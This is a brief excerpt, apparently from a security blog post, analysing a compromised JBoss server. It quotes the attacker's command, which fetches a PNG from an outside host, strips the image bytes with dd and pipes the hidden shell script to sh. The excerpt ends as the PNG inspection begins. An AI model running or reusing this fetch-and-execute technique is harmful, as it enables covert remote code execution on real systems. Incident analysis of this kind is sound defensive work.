Covert channels: Hiding shell scripts in PNG files
A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one: sh -c curl hxxp://img1.imagehousing.com/0/beauty-287196.png -k|dd skip=2446 bs=1|sh This is a rather elegant way of disguising malicious code. If we first take a look at the png file: […]